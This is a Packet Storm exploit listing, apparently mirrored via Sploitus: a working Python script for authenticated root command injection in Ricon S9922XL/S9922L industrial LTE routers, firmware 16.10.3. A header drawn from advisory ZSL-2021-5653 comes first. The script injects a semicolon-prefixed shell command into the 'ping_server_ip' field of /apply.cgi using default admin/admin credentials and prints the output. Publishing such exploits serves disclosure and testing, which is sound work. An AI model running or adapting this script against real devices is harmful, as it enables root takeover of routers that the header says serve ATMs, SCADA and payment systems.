Share
## https://sploitus.com/exploit?id=PACKETSTORM:163390
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
#  
#  
# Ricon Industrial Cellular Router S9922XL Remote Command Execution  
#  
#  
# Vendor: Ricon Mobile Inc.  
# Product web page: https://www.riconmobile.com  
# Affected version: Model: S9922XL and S9922L  
# Firmware: 16.10.3  
#  
# Summary: S9922L series LTE router is designed and manufactured by  
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology  
# with industrial class quality. With its embedded cellular module,  
# it widely used in multiple case like ATM connection, remote office  
# security connection, data collection, etc.  
#  
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi  
# and VPN technologies. Powerful 64-bit Processor and integrated real-time  
# operating system specially developed by Ricon Mobile. S9922XL is  
# widely used in many areas such as intelligent transportation, scada,  
# POS, industrial automation, telemetry, finance, environmental protection.  
#  
# Desc: The router suffers from an authenticated OS command injection  
# vulnerability. This can be exploited to inject and execute arbitrary  
# shell commands as the admin (root) user via the 'ping_server_ip' POST  
# parameter. Also vulnerable to Heartbleed.  
#  
# --------------------------------------------------------------------  
# C:\>python ricon.py 192.168.1.71 id  
# uid=0(admin) gid=0(admin)  
# --------------------------------------------------------------------  
#  
# Tested on: GNU/Linux 2.6.36 (mips)  
# WEB-ROUTER  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2021-5653  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php  
#  
#  
# 02.07.2021  
#  
  
import requests,sys,re  
  
if len(sys.argv)<3:  
print("Ricon Industrial Routers RCE")  
print("Usage: ./ricon.py [ip] [cmd]")  
sys.exit(17)  
else:  
ipaddr=sys.argv[1]  
execmd=sys.argv[2]  
  
data={'submit_class' :'admin',  
'submit_button' :'netTest',  
'submit_type' :'',  
'action' :'Apply',  
'change_action' :'',  
'is_ping' :'0',  
'ping_server_ip':';'+execmd}  
  
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))  
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))  
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')  
print(reout)